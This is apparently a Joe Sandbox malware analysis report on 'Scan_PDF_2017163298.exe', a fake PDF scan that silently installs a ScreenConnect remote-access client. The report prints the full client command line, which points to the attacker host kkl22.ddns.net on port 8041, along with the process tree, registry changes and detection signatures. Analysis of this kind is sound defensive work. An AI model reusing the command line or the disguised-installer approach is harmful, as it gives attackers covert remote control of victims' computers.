Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan_PDF_2017163298.exe

Overview

General Information

Sample name:Scan_PDF_2017163298.exe
Analysis ID:1523870
MD5:1204478277c15197fbdae6cc49c8f786
SHA1:da4038fb3569094afacf6edabab8f61323a5cccc
SHA256:fd0198e078b123e91bf968c6457666b8d9f9b5e69eae273665994d1a4595b6aa
Tags:exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:42
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Uses dynamic DNS services
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • Scan_PDF_2017163298.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\Scan_PDF_2017163298.exe" MD5: 1204478277C15197FBDAE6CC49C8F786)
    • msiexec.exe (PID: 7452 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7484 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7568 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F709E0C1738E8A53DFEDA48789872001 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7616 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9390.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5280796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7672 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 44B43403CFD66C9CC500A14417CF0426 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7720 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E44ABF9CE7CBB19DDF57A0D6AD3151E3 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7760 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=478e82c1-db06-42e2-b73b-60fd80c17bc4&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=windows%20pdf%20viewer&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7832 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "600c2429-3619-41f2-bc1a-bc0ec60c72d7" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 7964 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "be73d786-925b-47a5-99df-a44cdbf0e1aa" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • svchost.exe (PID: 3784 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Scan_PDF_2017163298.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Config.Msi\5096ec.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\MSI996C.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1365528966.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000009.00000000.1401154593.00000000001A2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000009.00000002.2588106191.00000000024F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000000.00000000.1335059252.0000000000346000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000A.00000002.1452815491.0000000002B21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 5 entries
                    SourceRuleDescriptionAuthorStrings
                    0.2.Scan_PDF_2017163298.exe.5ab0000.7.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      9.2.ScreenConnect.WindowsClient.exe.256fa20.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        9.0.ScreenConnect.WindowsClient.exe.1a0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          10.2.ScreenConnect.WindowsClient.exe.2b9fa60.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.2.Scan_PDF_2017163298.exe.5ab0000.7.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=478e82c1-db06-42e2-b73b-60fd80c17bc4&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=windows%20pdf%20viewer&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=478e82c1-db06-42e2-b73b-60fd80c17bc4&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=windows%20pdf%20viewer&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=478e82c1-db06-42e2-b73b-60fd80c17bc4&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=windows%20pdf%20viewer&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c=", ProcessId: 7760, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (e6cb77284cf765aa) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7484, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\(Default)
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 3784, ProcessName: svchost.exe
                              No Suricata rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.0% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_03FB16F8 CryptProtectData,8_2_03FB16F8
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_03FB16F0 CryptProtectData,8_2_03FB16F0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05710B10 CryptUnprotectData,8_2_05710B10
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05710BC1 CryptUnprotectData,8_2_05710BC1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05710B09 CryptUnprotectData,8_2_05710B09
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeEXE: msiexec.exeJump to behavior
                              Source: Scan_PDF_2017163298.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: Scan_PDF_2017163298.exeStatic PE information: certificate valid
                              Source: Scan_PDF_2017163298.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452336633.0000000002992000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401154593.00000000001A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Scan_PDF_2017163298.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Scan_PDF_2017163298.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Scan_PDF_2017163298.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: ttResolver.pdb source: Scan_PDF_2017163298.exe, 00000000.00000002.1345833223.00000000015F4000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2602218756.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459208723.0000000012B30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Scan_PDF_2017163298.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2588106191.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452815491.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452663213.00000000029F2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452189613.0000000002960000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Scan_PDF_2017163298.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1388241914.00000000009CD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Scan_PDF_2017163298.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1362019371.000000000507B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1365337506.0000000004F00000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Scan_PDF_2017163298.exe, 5096ed.msi.3.dr, MSI998C.tmp.3.dr, MSI996C.tmp.3.dr, 5096eb.msi.3.dr, MSI9EDC.tmp.3.dr, setup.msi.0.dr, 5096ec.rbs.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1362019371.000000000500C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2602218756.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459208723.0000000012B30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401154593.00000000001A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Scan_PDF_2017163298.exe, 5096ed.msi.3.dr, 5096eb.msi.3.dr, MSI9390.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: Scan_PDF_2017163298.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452336633.0000000002992000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: ttResolver.pdb1u source: Scan_PDF_2017163298.exe, 00000000.00000002.1345833223.00000000015F4000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2602218756.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459208723.0000000012B30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Scan_PDF_2017163298.exe
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: unknownDNS query: name: kkl22.ddns.net
                              Source: global trafficTCP traffic: 192.168.2.9:49707 -> 188.119.113.59:8041
                              Source: Joe Sandbox ViewIP Address: 188.119.113.59 188.119.113.59
                              Source: Joe Sandbox ViewASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: kkl22.ddns.net
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459208723.0000000012B30000.00000004.00000800.00020000.00000000.sdmp, Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1459208723.0000000012B30000.00000004.00000800.00020000.00000000.sdmp, Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2589102059.0000000001CDD000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1452815491.0000000002B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
